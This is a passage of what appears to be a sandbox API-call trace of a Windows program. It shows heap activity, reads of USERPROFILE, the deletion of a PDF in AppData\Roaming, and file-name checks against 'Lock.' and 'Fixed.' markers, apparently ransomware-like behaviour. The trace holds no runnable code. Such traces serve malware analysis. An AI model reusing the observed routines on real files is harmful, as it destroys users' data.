[0200.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0200.311] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0200.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0200.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0200.311] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0200.311] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0200.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0200.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0200.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0200.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0200.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0200.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0200.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0200.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0200.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0200.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0200.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0200.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0200.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0200.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0200.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0200.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0200.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0200.312] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0200.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0200.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0200.312] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0200.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0200.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x76) returned 0x24f5278 [0200.313] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/JLaCurEw.pdf", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JLaCurEw.pdf", lpFilePart=0x8bedfc*="JLaCurEw.pdf") returned 0x3a [0200.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0200.313] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JLaCurEw.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jlacurew.pdf")) returned 0x2020 [0200.313] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JLaCurEw.pdf", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x52df5e90, ftCreationTime.dwHighDateTime=0x1d4c7dc, ftLastAccessTime.dwLowDateTime=0xdf24fe70, ftLastAccessTime.dwHighDateTime=0x1d4d22a, ftLastWriteTime.dwLowDateTime=0xdf24fe70, ftLastWriteTime.dwHighDateTime=0x1d4d22a, nFileSizeHigh=0x0, nFileSizeLow=0x1a51, dwReserved0=0xc33, dwReserved1=0x4, cFileName="JLaCurEw.pdf", cAlternateFileName="")) returned 0xaa58a0 [0200.313] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JLaCurEw.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jlacurew.pdf")) returned 1 [0200.315] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x52df5e90, ftCreationTime.dwHighDateTime=0x1d4c7dc, ftLastAccessTime.dwLowDateTime=0xdf24fe70, ftLastAccessTime.dwHighDateTime=0x1d4d22a, ftLastWriteTime.dwLowDateTime=0xdf24fe70, ftLastWriteTime.dwHighDateTime=0x1d4d22a, nFileSizeHigh=0x0, nFileSizeLow=0x1a51, dwReserved0=0xc33, dwReserved1=0x4, cFileName="JLaCurEw.pdf", cAlternateFileName="")) returned 0 [0200.315] FindClose (in: hFindFile=0xaa58a0 | out: hFindFile=0xaa58a0) returned 1 [0200.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0200.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0200.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0200.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0200.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0200.315] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0200.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0200.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0200.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0200.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0200.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0200.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0200.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0200.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0200.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0200.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0200.316] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0200.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0200.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0200.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 [0200.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0200.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0200.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9288 [0200.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0200.316] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0200.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0200.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0200.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0200.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0200.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0200.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0200.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0200.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0200.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0200.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0200.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0200.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0200.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0200.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0200.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0200.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0200.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0200.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0200.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0200.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0200.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0200.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0200.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0200.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0200.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0200.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0200.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0200.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0200.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0200.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0200.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0200.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0200.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0200.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0200.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0200.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0200.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0200.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x76) returned 0x24f5278 [0200.318] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/JLaCurEw.pdf", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JLaCurEw.pdf", lpFilePart=0x8bf658*="JLaCurEw.pdf") returned 0x3a [0200.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0200.318] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\JLaCurEw.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jlacurew.pdf")) returned 0xffffffff [0200.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0200.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0200.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0200.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0200.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0200.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0200.318] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0200.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0200.319] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0200.319] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0200.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0200.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0200.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0200.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0200.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0200.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0200.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0200.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0200.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0200.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0200.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0200.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0200.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0200.319] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jOF28qdC.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0200.319] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OF28qdC.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0200.319] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F28qdC.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0200.319] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="28qdC.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0200.319] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8qdC.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0200.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qdC.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0200.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dC.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0200.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C.m4a", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0200.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0200.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0200.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0200.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0200.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0200.320] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0200.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0200.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0200.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0200.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0200.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0200.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jOF28qdC.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0200.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OF28qdC.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0200.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F28qdC.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0200.320] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="28qdC.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0200.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8qdC.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0200.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qdC.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0200.321] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dC.m4a", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0200.321] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0200.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0200.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0200.321] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0200.321] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0200.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0200.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0200.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa878 [0200.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0200.321] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0200.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0200.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0200.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ff0 [0200.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0200.321] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0200.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0200.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0200.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0200.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0200.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0200.322] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0200.322] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.322] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0200.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0200.322] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0200.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0200.322] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0200.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0200.322] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0200.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0200.322] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/jOF28qdC.m4a", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3cb5d5a0, ftCreationTime.dwHighDateTime=0x1d4d4f6, ftLastAccessTime.dwLowDateTime=0x10645790, ftLastAccessTime.dwHighDateTime=0x1d4d174, ftLastWriteTime.dwLowDateTime=0x10645790, ftLastWriteTime.dwHighDateTime=0x1d4d174, nFileSizeHigh=0x0, nFileSizeLow=0x131aa, dwReserved0=0xa7f0039, dwReserved1=0x171a8, cFileName="jOF28qdC.m4a", cAlternateFileName="")) returned 0xaa58a0 [0200.323] FindClose (in: hFindFile=0xaa58a0 | out: hFindFile=0xaa58a0) returned 1 [0200.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0200.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0200.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0200.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0200.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0200.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0200.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0200.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0200.323] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0200.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0200.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0200.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0200.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0200.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0200.324] RtlAllocateHeap 